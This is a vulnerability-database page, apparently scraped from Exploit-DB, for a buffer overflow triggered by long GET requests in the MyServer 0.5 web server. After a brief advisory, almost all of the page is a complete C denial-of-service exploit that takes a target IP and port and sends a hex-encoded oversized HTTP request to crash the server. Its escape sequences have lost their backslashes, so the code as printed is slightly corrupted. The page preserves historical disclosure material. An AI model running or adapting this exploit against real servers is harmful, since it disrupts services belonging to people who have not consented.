MyServer 0.5 – GET Argument Buffer Overflow-安全小百科

MyServer 0.5 – GET Argument Buffer Overflow

漏洞ID	1054148	漏洞类型
发布时间	2003-09-08	更新时间	2003-09-08
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/22701

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/7770/info
 
myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length.
 
Although unconfirmed, this vulnerability may be exploited to execute attacker-supplied code with the privileges of the vulnerable web server.

/* MyServer 0.5 DoS 
   vendor:
   http://myserverweb.sourceforge.net
 
   coded and discovered by:
   badpack3t <[email protected]>
   for .:sp research labs:.
   www.security-protocols.com
   11.12.2003
  
   usage: 
   sp-myserv <targetip> [targetport] (default is 80)
 */

// #include "stdafx.h"
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* entire request */
"x47x45x54x20x2fx41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x01x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x2e"
"x68x74x6dx6cx20x48x54x54x50x2fx31x2ex31x0dx0ax52"
"x65x66x65x72x65x72x3ax20x68x74x74x70x3ax2fx2fx6c"
"x6fx63x61x6cx68x6fx73x74x2fx66x75x78x30x72x0dx0a"
"x43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x61x70"
"x70x6cx69x63x61x74x69x6fx6ex2fx78x2dx77x77x77x2d"
"x66x6fx72x6dx2dx75x72x6cx65x6ex63x6fx64x65x64x0d"
"x0ax43x6fx6ex6ex65x63x74x69x6fx6ex3ax20x4bx65x65"
"x70x2dx41x6cx69x76x65x0dx0ax55x73x65x72x2dx41x67"
"x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex37"
"x36x20x5bx65x6ex5dx20x28x58x31x31x3bx20x55x3bx20"
"x4cx69x6ex75x78x20x32x2ex34x2ex32x2dx32x20x69x36"
"x38x36x29x0dx0ax56x61x72x69x61x62x6cx65x3ax20x72"
"x65x73x75x6cx74x0dx0ax48x6fx73x74x3ax20x6cx6fx63"
"x61x6cx68x6fx73x74x0dx0ax43x6fx6ex74x65x6ex74x2d"
"x6cx65x6ex67x74x68x3ax20x35x31x33x0dx0ax41x63x63"
"x65x70x74x3ax20x69x6dx61x67x65x2fx67x69x66x2cx20"
"x69x6dx61x67x65x2fx78x2dx78x62x69x74x6dx61x70x2c"
"x20x69x6dx61x67x65x2fx6ax70x65x67x2cx20x69x6dx61"
"x67x65x2fx70x6ax70x65x67x2cx20x69x6dx61x67x65x2f"
"x70x6ex67x0dx0ax41x63x63x65x70x74x2dx45x6ex63x6f"
"x64x69x6ex67x3ax20x67x7ax69x70x0dx0ax41x63x63x65"
"x70x74x2dx43x68x61x72x73x65x74x3ax20x69x73x6fx2d"
"x38x38x35x39x2dx31x2cx2ax2cx75x74x66x2dx38x0dx0a"
"x0dx0ax77x68x61x74x79x6fx75x74x79x70x65x64x3dx3f"
"x0dx0a";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("MyServer 0.5 DoS by badpack3trn <[email protected]>rnrn", argv[0]);
		printf("Usage:rn %s <targetip> [targetport] (default is 80)rnrn", argv[0]);
		printf("www.security-protocols.comrnrn", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 80;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!rn");
		exit(1);
	}

	printf("Resolving Hostnames...n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failedn", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.n");
		exit(1);
	}

	printf("Connected!...n");
	printf("Sending Payload...n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payloadrn");
		closesocket(mysocket);
		exit(1);
	}

	printf("Remote Webserver has been DoS'ed rn");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}

相关推荐: Microsoft Windows 98/ME/XP File Decompression Vulnerabilities

Microsoft Windows 98/ME/XP File Decompression Vulnerabilities 漏洞ID 1101502 漏洞类型 Unknown 发布时间 2002-10-02 更新时间 2002-10-02 CVE编号 N/A …

文章版权归作者所有，未经允许请勿转载。

THE END